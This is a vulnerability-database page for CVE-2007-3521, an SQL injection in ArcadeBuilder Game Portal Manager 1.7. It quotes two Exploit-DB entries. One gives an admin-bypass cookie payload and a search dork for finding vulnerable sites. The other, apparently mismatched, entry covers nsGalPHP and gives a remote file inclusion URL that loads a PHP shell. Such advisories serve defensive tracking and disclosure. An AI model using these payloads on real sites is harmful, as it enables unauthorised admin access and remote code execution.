CVE-2007-3521
published 2007-07-03CVE-2007-3521: SQL injection vulnerability in ArcadeBuilder Game Portal Manager 1.7 allows remote attackers to execute arbitrary SQL commands via a usercookie cookie.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.06%
60.3th percentile
SQL injection vulnerability in ArcadeBuilder Game Portal Manager 1.7 allows remote attackers to execute arbitrary SQL commands via a usercookie cookie.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arcadebuilder | game_portal_manager | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ArcadeBuilder Game Portal Manager 1.7 - SQL Injection
exploitdb·2007-07-01
CVE-2007-3521 ArcadeBuilder Game Portal Manager 1.7 - SQL Injection
ArcadeBuilder Game Portal Manager 1.7 - SQL Injection
---
--==+================================================================================+==--
--==+ Game Portal Manager v1.7 SQL Injection Vulnerability +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.arcadebuilder.net/
DORK: intext:"Powered by Arcade Builder"
DESCRIPTION: The browser cookie is sql injectable, allowing admin access without knowing the password.
EXPLOIT: Using your prefered cookie editor make a cookie with the following;
Name: usercookie
Content: admin'/*
Host: www.somesite.com
Path: /
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+================================================================================+=
Exploit-DB
nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion
exploitdb·2007-01-27
CVE-2007-0573 nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion
nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion
---
________| |________
\ | S.W.A.T. | /
\ | | /
/ |_________________________________| \
/___________) (___________\
Script:nsGalPHP
Affected Version:unknown
Downlaoad&Victim:http://www.easy-script.com/compt.php?id=3521
Author:S.W.A.T.
Bug in (includes/config.inc.php)
Vul Code;
include_once($racineTBS.'includes/tbs_class.php');
include_once($racineTBS.'includes/fonctions.inc.php');
require($racineTBS.'lang/'.$config['langueDefaut'].'.php');
POC:
http://[target]/[path]/includes/config.inc.php?racineTBS=[PHPSHELL]
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:All Member Of XmorsTEAM
# milw0rm.com [2007-01-27]
No writeups or analysis indexed.
http://osvdb.org/36367http://secunia.com/advisories/25916http://www.securityfocus.com/bid/24731https://exchange.xforce.ibmcloud.com/vulnerabilities/35198https://www.exploit-db.com/exploits/4133http://osvdb.org/36367http://secunia.com/advisories/25916http://www.securityfocus.com/bid/24731https://exchange.xforce.ibmcloud.com/vulnerabilities/35198https://www.exploit-db.com/exploits/4133
2007-07-03
Published